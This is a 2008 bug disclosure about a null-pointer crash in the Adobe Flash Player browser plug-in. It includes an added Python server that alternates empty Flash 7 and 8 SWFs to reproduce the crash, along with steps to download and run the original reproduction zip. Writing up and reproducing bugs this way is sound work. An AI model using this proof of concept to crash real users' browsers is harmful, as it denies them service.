The explanation below was written in October 2008, while I was an engineer at Mochi Media.
If a Flash 9 SWF loads the same URL twice and the first response is a Flash 7 SWF while the second is a Flash 8 SWF (or vice versa), the Adobe Flash Player plug-in dereferences a null pointer and crashes the browser.
Using the server included with the sample code below, an HTTP request for / returns a Flash 9 SWF that uses flash.display.Loader to load two instances of /b. HTTP requests for /b alternately return an empty SWF compiled for Flash 7 or for Flash 8.
This example only uses GET requests, but POST requests also work. The URL (including query string arguments) must be the same for both requests to /b, but the POST requests may carry different request entities.
There's seemingly nothing special about 7 and 8, except that 7 ≠ 8: compiling for any distinct pair of versions from 6, 7, and 8 instead of 7 and 8 also results in crashes. The first response can also instead be an image file supported by Flash, such as a PNG or JPEG.
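Here is an added example, not the flashcrash.py shipped in the zip below, of the server the text describes, written for Python 3 rather than the Python 2.5 the sample targeted. It hand-builds the empty Flash 7 and Flash 8 SWFs (signature and version byte, file length, stage RECT, frame rate and count, then ShowFrame and End tags, plus the FileAttributes tag that SWF 8 and later require as the first tag) and alternates them on every hit to the same URL, query string included, for GET and POST alike. The Flash 9 loader SWF that calls flash.display.Loader on /b twice contains ActionScript 3 bytecode and cannot be generated this way; it is assumed to have been compiled separately and saved as loader.swf, a file name chosen here. Alternator accepts any pair (or longer cycle) of versions, which is the generalization the previous paragraph notes.

```python
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer

# Flash 9 SWF that loads /b twice via flash.display.Loader. It must be built
# with an AS3 compiler; this script does not generate it (assumed file name).
LOADER_SWF = "loader.swf"


def pack_bits(fields):
    """Pack (value, nbits) pairs MSB-first, zero-padded to a byte boundary."""
    bits = "".join(format(v & ((1 << n) - 1), "0%db" % n) for v, n in fields)
    bits += "0" * (-len(bits) % 8)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def encode_rect(xmin, xmax, ymin, ymax):
    """SWF RECT: 5-bit field width, then four signed twip coordinates."""
    nbits = max(abs(v).bit_length() for v in (xmin, xmax, ymin, ymax)) + 1
    return pack_bits([(nbits, 5), (xmin, nbits), (xmax, nbits),
                      (ymin, nbits), (ymax, nbits)])


def empty_swf(version):
    """Build an uncompressed one-frame SWF with no content for `version`."""
    # Header body: 550x400 px stage in twips, 12 fps as 8.8 fixed, 1 frame.
    body = encode_rect(0, 11000, 0, 8000) + struct.pack("<HH", 12 << 8, 1)
    tags = b""
    if version >= 8:
        # FileAttributes (tag 69, 4 flag bytes) must come first from SWF 8 on.
        tags += struct.pack("<HI", (69 << 6) | 4, 0)
    tags += struct.pack("<H", 1 << 6)   # ShowFrame (tag 1), length 0
    tags += struct.pack("<H", 0)        # End (tag 0)
    length = 8 + len(body) + len(tags)  # FileLength includes the 8-byte header
    return b"FWS" + bytes([version]) + struct.pack("<I", length) + body + tags


class Alternator:
    """Cycle through SWF versions per URL (path plus query string)."""

    def __init__(self, versions=(7, 8)):
        self.versions = tuple(versions)
        self.hits = {}

    def next_version(self, url):
        n = self.hits.get(url, 0)
        self.hits[url] = n + 1
        return self.versions[n % len(self.versions)]


ALTERNATOR = Alternator()


class Handler(BaseHTTPRequestHandler):
    def _send(self, status, data, ctype="application/x-shockwave-flash"):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(data)))
        # Stop the plug-in from serving the second load from its cache so that
        # both requests for /b reach the server (a choice made here).
        self.send_header("Cache-Control", "no-store")
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        if self.path == "/":
            try:
                with open(LOADER_SWF, "rb") as f:
                    self._send(200, f.read())
            except OSError:
                self._send(404, b"compile loader.swf first", "text/plain")
        else:
            # Same URL, different version on each hit: /b, /b, ... -> 7, 8, ...
            self._send(200, empty_swf(ALTERNATOR.next_version(self.path)))

    def do_POST(self):
        # Request entities may differ; only the URL is used as the key.
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        self.do_GET()


if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()
```

Run it in the directory holding loader.swf and open http://127.0.0.1:8080/ as described below; `empty_swf(6)` or `Alternator((6, 8))` reproduces the other version pairs mentioned above.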
Download the sample code here. This zip file includes a simple web server written in Python that has been tested to work correctly on OS X 10.5.4 and 10.5.5 but is expected to work on any system with Python 2.5.
Download, unzip, and start the server by running:
$ curl -O http://flashcrash.dempsky.org/flashcrash-20080919.zip
$ unzip flashcrash-20080919.zip
$ cd flashcrash-20080919
$ python flashcrash.py
The server will listen on port 8080. While the server is running, open http://127.0.0.1:8080/ in a browser using the Adobe Flash Player plug-in. Within a few seconds, the entire browser should crash.
This code has been tested with Safari 3.1.2 and Firefox 3.0.1 with Adobe's Flash Player plug-in 9.0.115.0, 9.0.124.0, and 10.0.12.10 on OS X 10.5.4 and 10.5.5.
This code has also been tested with Internet Explorer 6.0 and 7.0, Firefox 3.0.1, and Chrome 0.2.149.30 with Adobe's Flash Player plug-in 9.0.45.0 and 9.0.124.0 on Windows XP Professional SP2. In the Chrome tests, only the one tab crashed rather than the whole browser. In one IE7 test, the browser became completely unresponsive and a reboot was needed to recover, but we could not reproduce this.
This code has also been tested with Firefox 3.0.1 with Adobe's Flash Player plug-in 9.0.124.0 on Ubuntu 8.04 on amd64. On this platform, the Flash Player plug-in runs in a separate process (under nspluginwrapper) so only that process crashes instead of the entire browser.
One of our users, Jared, reported a problem where his Flash game would crash his browser. One of our engineers, Moshen Chan, reproduced the issue Jared reported and found a simple work-around (appending a varying query string to every request). Another of our engineers, Matthew Dempsky, further simplified Moshen's test case into the above description and sample code.